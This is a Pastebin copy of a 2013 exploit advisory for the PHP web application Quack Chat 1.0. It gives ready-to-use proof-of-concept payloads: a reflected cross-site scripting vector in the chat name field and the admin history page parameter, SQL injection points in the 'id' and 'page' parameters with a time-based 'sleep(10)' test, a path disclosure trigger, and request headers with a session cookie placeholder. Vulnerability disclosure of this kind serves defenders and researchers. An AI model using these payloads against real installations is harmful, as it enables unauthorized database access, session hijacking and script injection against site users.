Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title: Quack Chat 1.0 - Multiple Vulnerabilities
- Date add: 2013-08-18
- Category: web applications
- Platform: php
- Description:
- Quark Chat version 1.0 suffers from cross site scripting, path disclosure, and remote SQL injection vulnerabilities.
- ================================================================
- ###########################################################################################
- # Exploit Title: Quack Chat 1.0 - XSS / SQL Injection / Path Diclosure
- # Date: 15 de Agosto del 2013
- # Exploit Author: Dylan Irzi
- # Credit goes for: websecuritydev.com
- # Vendor Homepage: http://www.quack-chat.com/
- # Tested on: Win8 & Linux Mint
- # Affected Version : 1.0
- # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
- # Greetz: All team WebSecuritydev.
- ###########################################################################################
- Cross Site Scripting:
- Archivos Afectados Afectados
- qchat.php
- qc_admin/index.php?p=history
- PoC:
- localhost/qchat.php
- Vector: ""><img src=x onerror=prompt(/XSS/);>>
- Input:
- <input id="name" type="text" style="width:200px;" name="name">
- Is Reflected: localhost/qc_admin/index.php?p=history
- PoC #2:
- localhost/qc_admin/index.php?p=history&page=2+(XSS Vector)
- Example:
- localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E
- -------------------------------------------------------------------
- SQL Injection
- localhost/qc_admin/index.php?p=history&id=(SQL Injection)
- localhost/qc_admin/index.php?p=history&page=(SQL Injection)
- # Exploit-DB note: Here's a PoC:
- # <server>/qc_admin/index.php?p=history&id=1 and sleep(10)
- Accept: */*
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
- CLR 2.0.50727)
- Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e
- (Remplazar por una Session Cookie Valida)
- -------------------------------------------------------------------
- Path Diclosure
- localhost/qc_admin/index.php?p=history&id='
- in /var/www/chat/qc_admin/index.php on line 249
- --------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement